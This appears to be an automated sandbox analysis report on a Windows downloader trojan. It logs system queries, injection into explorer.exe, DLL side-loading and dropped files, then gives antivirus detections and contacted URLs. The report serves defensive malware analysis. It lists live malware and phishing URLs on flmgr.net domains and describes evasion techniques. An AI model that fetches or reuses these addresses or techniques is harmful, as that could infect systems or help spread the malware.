Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_1000346C cpuid 0_3_1000346C
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10002EC5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_3_10002EC5
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00182540 RegFlushKey,RegCloseKey,GetVersionExW,23_2_00182540
Source: _____NCM______2_10042231.exe, 00000000.00000003.528523771.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.732037821.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.528631713.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\192.168.2.1\all\procexp.exe
Source: explorer.exe, 00000012.00000002.771726343.0000000000EA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "c:\users\user\desktop\procexp.exe
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00162570 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,23_2_00162570
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation
11
DLL Side-Loading
11
DLL Side-Loading
1
Disable or Modify Tools
1
Input Capture
1
System Time Discovery
Remote Services11
Archive Collected Data
Exfiltration Over Other Network Medium12
Ingress Tool Transfer
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Native API
2
DLL Search Order Hijacking
2
DLL Search Order Hijacking
2
Obfuscated Files or Information
LSASS Memory3
File and Directory Discovery
Remote Desktop Protocol1
Input Capture
Exfiltration Over Bluetooth11
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Service Execution
2
Windows Service
2
Windows Service
1
Software Packing
Security Account Manager46
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)111
Process Injection
1
Timestomp
NTDS1
Query Registry
Distributed Component Object ModelInput CaptureScheduled Transfer24
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
DLL Side-Loading
LSA Secrets171
Security Software Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common2
DLL Search Order Hijacking
Cached Domain Credentials11
Process Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Masquerading
DCSync161
Virtualization/Sandbox Evasion
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job161
Virtualization/Sandbox Evasion
Proc Filesystem1
Remote System Discovery
Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)111
Process Injection
/etc/passwd and /etc/shadow1
System Network Configuration Discovery
Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1285857 Sample: _____NCM______2_10042231.exe Startdate: 04/08/2023 Architecture: WINDOWS Score: 42 62 s.360.cn 2->62 76 Snort IDS alert for network traffic 2->76 78 Antivirus detection for URL or domain 2->78 80 Multi AV Scanner detection for submitted file 2->80 8 _____NCM______2_10042231.exe 88 86 2->8         started        13 FLServer.exe 2->13         started        15 explorer.exe 12 22 2->15         started        signatures3 process4 dnsIp5 64 api.flmgr.net 123.57.49.36, 49700, 49705, 49722 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 8->64 66 api.nasyeo.com 60.205.148.178, 49706, 80 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 8->66 74 13 other IPs or domains 8->74 48 C:\Users\user\AppData\Local\...\zlibwapi.dll, PE32 8->48 dropped 50 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 8->50 dropped 52 C:\Users\user\AppData\...\winManager.exe, PE32 8->52 dropped 54 72 other files (66 malicious) 8->54 dropped 86 Injects code into the Windows Explorer (explorer.exe) 8->86 17 FLMgrTray.exe 8->17         started        22 taskkill.exe 1 8->22         started        24 taskkill.exe 1 8->24         started        28 7 other processes 8->28 68 www.wshifen.com 13->68 70 www.baidu.com 13->70 72 www.a.shifen.com 13->72 88 Machine Learning detection for dropped file 13->88 26 FLMgrTray.exe 13->26         started        90 DLL side loading technique detected 15->90 file6 signatures7 process8 dnsIp9 56 api.flmgr.net 17->56 58 dl.360safe.com.dl.360qhcdn.com 104.192.108.19, 443, 49745, 49746 QIHOOBeijingQihuTechnologyCompanyLimitedCN United States 17->58 60 7 other IPs or domains 17->60 42 C:\Users\user\AppData\Local\...\KitTip.dll, PE32 17->42 dropped 44 C:\Users\user\AppData\...\InternetKitTip.dll, PE32 17->44 dropped 46 C:\Users\user\AppData\Local\...\KitTip.dll, PE32 17->46 dropped 82 Found stalling execution ending in API Sleep call 17->82 84 Hides threads from debuggers 17->84 30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 28->34         started        36 conhost.exe 28->36         started        38 conhost.exe 28->38         started        40 3 other processes 28->40 file10 signatures11 process12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
_____NCM______2_10042231.exe34%ReversingLabsWin32.Trojan.Downer
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\winManager\FLServer.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\KitTip\KitTip.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\hDxGcHaQeXbCzSxU\InternetKitTip.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\hDxGcHaQeXbCzSxU\KitTip.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\API-MS-Win-core-xstate-l2-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\CrashRpt.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\CrashSender.exe5%ReversingLabs
C:\Users\user\AppData\Local\winManager\DuiLib.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\FLExt.exe0%ReversingLabs
C:\Users\user\AppData\Local\winManager\FLMgrTray.exe0%ReversingLabs
C:\Users\user\AppData\Local\winManager\FLMgrUpdate.exe0%ReversingLabs
C:\Users\user\AppData\Local\winManager\FLPdfTrans.exe4%ReversingLabs
C:\Users\user\AppData\Local\winManager\FLServer.exe0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-fibers-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\concrt140.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\imgdecoder-gdip.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\imgdecoder-png.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\jsoncpp.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\leave.exe8%ReversingLabs
C:\Users\user\AppData\Local\winManager\libcrypto-1_1.dll4%ReversingLabs
C:\Users\user\AppData\Local\winManager\libcurl.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\libqpdf.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\libssl-1_1.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\msvcp120.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\msvcp140.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\msvcr120.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\node.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\render-skia.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\resprovider-zip.dll6%ReversingLabs
C:\Users\user\AppData\Local\winManager\soui-sys-resource.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\soui3.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\ucrtbase.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\utilities.dll5%ReversingLabs
C:\Users\user\AppData\Local\winManager\vcruntime140.dll0%ReversingLabs
C:\Users\user\AppData\Local\winManager\winLead.exe8%ReversingLabs
C:\Users\user\AppData\Local\winManager\winManager.exe0%ReversingLabs
C:\Users\user\AppData\Local\winManager\zlib1.dll4%ReversingLabs
C:\Users\user\AppData\Local\winManager\zlibwapi.dll5%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.jiyu-kobo.co.jp/40%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.carterandcone.como.0%URL Reputationsafe
http://www.sandoll.co.krx0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/P0%URL Reputationsafe
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/J0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/A0%URL Reputationsafe
http://api.nasyeo.com:80/log/closeh0%Avira URL Cloudsafe
http://www.sandoll.co.kr(0%Avira URL Cloudsafe
http://api.flmgr.net:80angfang-AREACUCC1-CACHE230%Avira URL Cloudsafe
http://www.jiyu-kobo.co.jp/=0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/x0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
http://www.carterandcone.comn:0%Avira URL Cloudsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.founder.com.cn/cntte;0%Avira URL Cloudsafe
http://www.sandoll.co.kr=0%Avira URL Cloudsafe
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://www.carterandcone.com80%URL Reputationsafe
http://downloader.regeeve.com/client/debugq0%Avira URL Cloudsafe
http://static.flmgr.net/green/1.0.6.2.png100%Avira URL Cloudmalware
http://apisvchost.exe0%Avira URL Cloudsafe
http://api.flmgr.net/log/client/site_soft?Action=down_start&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0100%Avira URL Cloudmalware
http://www.fontbureau.comalsy0%Avira URL Cloudsafe
http://api.flmgr.net/log/client/site_softhttp://api.flmgr.net/log/client/install100%Avira URL Cloudmalware
http://api.flmgr.net/v1/api/system100%Avira URL Cloudmalware
http://api.flmgr.net/log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode100%Avira URL Cloudmalware
http://api.flmgr.net/v1/client/soft/find_keyname?SoftID=%d/taskidcurrentspeedremaintimestatuscodedow100%Avira URL Cloudmalware
http://api.flmgr.net/log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0100%Avira URL Cloudmalware
http://www.sandoll.co.kr0%URL Reputationsafe
http://cacerts.digic0%URL Reputationsafe
http://api.flmgr.net/v1/client/configs50100%Avira URL Cloudmalware
https://gstararch.gstarcad.cn/2023/2D/230529/GstarCAD2023_ZH_x64.exe100%Avira URL Cloudphishing
http://www.zhongyicts.com.cnltE0%Avira URL Cloudsafe
http://www.carterandcone.comK0%URL Reputationsafe
http://narwhaljs.org)0%Avira URL Cloudsafe
http://static.flmgr.net/green/1.2.3100%Avira URL Cloudmalware
https://union.2345cdn.nows0%Avira URL Cloudsafe
https://union.2345cdn.net/union3422_pic/2345pic_lm_511196_v10.10_silent.exe0%Avira URL Cloudsafe
http://client.flmgr.net/home/recommend?taskbar_closeget100%Avira URL Cloudmalware
http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
http://www.flmgr.net/win_agreement.html100%Avira URL Cloudmalware
http://api.nasyeo.com/0%Avira URL Cloudsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.flmgr.net/win_fl_agreement.htmlRptMain.xml_USERPROFILEGeneralDisplayNameSoftidWebidSdsoft100%Avira URL Cloudmalware
http://api.flmgr.net/log/client/stay?User=%s&InstallDate=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=100%Avira URL Cloudmalware
http://api.flmgr.net/e100%Avira URL Cloudmalware
http://www.fontbureau.comicva0%Avira URL Cloudsafe
http://api.flmgr.net/v1/client/theme?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&Winver=10.0&100%Avira URL Cloudmalware
http://static-img.flmgr.net/20230717170650.png100%Avira URL Cloudmalware
http://api.nasyeo.com:80/log/nextrs0%Avira URL Cloudsafe
http://www.fontbureau.comionmJ0%Avira URL Cloudsafe
https://pc-package.wpscdn.cn/wps/dow0%Avira URL Cloudsafe
http://api.flmgr.net/m100%Avira URL Cloudmalware
http://api.flmgr.net/log/client/site_soft?Action=down_suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0100%Avira URL Cloudmalware
http://www.galapagosdesign.com/staff/dennis.htmf0%Avira URL Cloudsafe
http://api.flmgr.net/log/client/install?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer=100%Avira URL Cloudmalware
http://api.flmgr.net/4AD100%Avira URL Cloudmalware
http://static.flmgr.net/kit/KitTip.dll100%Avira URL Cloudmalware
http://api.nasyeo.com/log/next00%Avira URL Cloudsafe
http://api.nasyeo.com/api/info0%Avira URL Cloudsafe
https://pc-package.wpscdn.cn/wps/download/W.P.S.20.3001.exe0%Avira URL Cloudsafe
https://gstararch.gstarcad.cn/2023/2D/230529/GstarCAD2023_ZH_x64.exev10%Avira URL Cloudsafe
http://api.flmgr.net/log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer=100%Avira URL Cloudmalware
http://api.nasyeo.com/log/next0%Avira URL Cloudsafe
